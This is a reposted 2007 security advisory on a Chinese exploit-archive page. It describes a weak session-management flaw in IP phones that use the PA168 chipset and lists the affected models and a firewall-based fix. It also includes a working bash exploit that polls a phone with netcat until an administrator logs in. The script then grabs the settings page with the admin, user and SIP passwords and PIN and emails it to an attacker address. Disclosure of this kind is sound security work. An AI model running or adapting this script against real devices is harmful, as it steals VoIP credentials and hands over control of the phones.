首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PA168 Chipset IP Phones Weak Session Management Exploit
来源:adrian.pastor-AT-procheckup.com 作者:Adrian 发布时间:2007-01-25  

#!/bin/bash
# PR06-14: IP Phones based on Centrality Communications/Aredfox PA168 chipset weak session management vulnerability

# Author: Adrian Pastor [adrian.pastor-AT-procheckup.com] from ProCheckUp

# This advisory has been published following consultation with UK NISCC [http://www.niscc.gov.uk/]
# Date Found: 3rd November 2006
# Date Public: 22nd January 2007
# Vulnerable:
# Phones confirmed to be vulnerable:
# - ATCOM AT-320ED IP Phone running SIP firmware version V1.42 and 1.54
# - SOYO G668 Ethernet IP Phone running SIP firmware version v1.42
# The following vendors/models also use the same PA168 chipset/firmware
# and are therefore most likely to be vulnerable to the same issue:
# - AriaVoice
# - AT-323 from ATcom
# - JR168_100B from IPLink
# - JR168_100W from IPLink
# - JR168_200 from IPLink
# - Netweb-401/402 from NetWebGroup
# - OB-WAN VoIP: Ethernet#1 and Ethernet#2 phones are PA168-based
# - Vida some phones PA168 based
# - Wuchuan HOP-1001/1002/1003
# - Giptel IP phones G100, also Siptronic ST-100 and Siptronic ST-150 (PA168S chipset)
# - GNET some phones PA168x based
# - KE1020 Netphone (Meritline)
# - ML210 Meritline
# - Integrated Networks IN-1002. Found on eBay.
# - ArtDio IPF-2000 and IPF-2002L phones
# - Perfectone IP300

# Severity: Medium

# CVE Candidate: Not assigned

# Overview:
# There is a problem with the way IP Phones using the PA168 chipset handle
# authenticated sessions, allowing remote attackers to gain access to the
# admin web console running as superuser.

# Description:
# When the superuser account authenticates to the admin web console, a
# request such as the following is sent to the IP phone's web server:

# POST /a HTTP/1.1
# Referer: http://192.168.1.100/
# Host: 192.168.1.100
# Content-Length: 31

# auth=12345678&login=+++Login+++

# At this point, the superuser session is considered *active* by the web
# server. All it takes for attackers to perform an administrative task at
# this point, is for them to send a well-formed request to the web server.
# Since no authentication tokens or password are submitted within the HTTP
# requests, anyone can perform administrative tasks while the session is
# active. Even if the attacker sends the administrative requests from an
# IP address different to the one used by the superuser account, the IP
# Phone's web server would accept them as long as the superuser's session
# is still active.

# A script called "active-session-attack.sh" has been created, which
# remotely checks repeatedly until a superuser account has logged on by
# sending a forged superuser request every five seconds. As soon as the
# superuser session becomes active, the following information will be
# obtained from the settings page, and emailed to the attacker:

# - IP phone's superuser password - grants administrative access
# - IP phone's user password - grants restricted access
# - SIP gateway hostname/IP address
# - SIP account username
# - SIP account PIN number

# REQUEST:

# POST /g HTTP/1.1
# Host: 192.168.1.100
# Content-Length: 13

# back=++Back++

# RESPONSE (output has been partially omitted for clarification):

# HTTP/1.1 200 OK
# Content-Length: 16727
# Content-Type: text/html
# Connection: close

# <TITLE>IP Phone V1.54</TITLE>
# [output omitted]
# <INPUT name=sipproxy value="sip.test.com">
# <INPUT name=domain value="sip.test.com">
# <INPUT name=account value="myaccount" size=24 maxlength=32>
# <INPUT name=pin type=password value="1234">
# <INPUT name=superpassword type=password value="12345678">
# <INPUT name=password type=password value="1234">
# [output omitted]

# In order to test this vulnerability, the following steps have been provided:

# 1. Log into http://192.168.1.100 from computer A using the superuser
# password ('12345678' by default)
# 2. Send the following curl command from computer B:
# curl -d "back=++Back++" http://192.168.1.100/g
# 3. The administrative settings page should be returned without any
# password required.
# Note: the IP phone's web server is enabled by default
# Fix:

# Use access control lists on routers or firewalls in order to only allow
# trusted IP addresses to access ATCOM AT-320ED IP Phone's web server.
# Exposing the PA168-based IP Phone's admin web server on the Internet is
# not recommended.

# References:
# http://www.voip-info.org/wiki/view/PA168
# http://www.centralitycomm.com/
# http://www.aredfox.com/eindex.htm
# http://www.atcom.cn/En_products_At320ED.html
# http://www.soyogroup.com/products/proddesc.php?id=307
# http://www.procheckup.com/Vulner_2007.php

host="192.168.1.100";
attackers_email="adrian.pastor-AT-procheckup.com"
req="POST /g HTTP/1.0\r\nContent-length: 13\r\n\r\nback=++Back++\r\n\r\n";

while true
do
res=`echo -en $req | nc -nv $host 80`;
if echo $res | grep superpassword # if this gets returned, then we got the settings page with all SIP account and IP phone creds
then
echo "GOT IT!"
echo $res > "admin-settings-page"
echo $res | mail $attackers_email -s "PA168 IP Phone admin's settings page"
exit 1
else
echo "bad luck"
fi
sleep 5
done



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Sami HTTP Server 2.0.1 (HTTP 4
·MS Windows Explorer (AVI) Unsp
·Mac OS X 10.4.8 (UserNotificat
·Xero Portal (phpbb_root_path)
·Vote-Pro 4.0 (poll_frame.php p
·Microsoft Excel Malformed Pale
·Oracle 10g SYS.KUPV$FT.ATTACH_
·Forum Livre 1.0 (SQL Injection
·Oracle 10g SYS.KUPW$WORKER.MAI
·Aztek Forum 4.0 Multiple Vulne
·Oracle 10g SYS.DBMS_CDC_IMPDP.
·Oracle <= 9i / 10g (read/wr
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved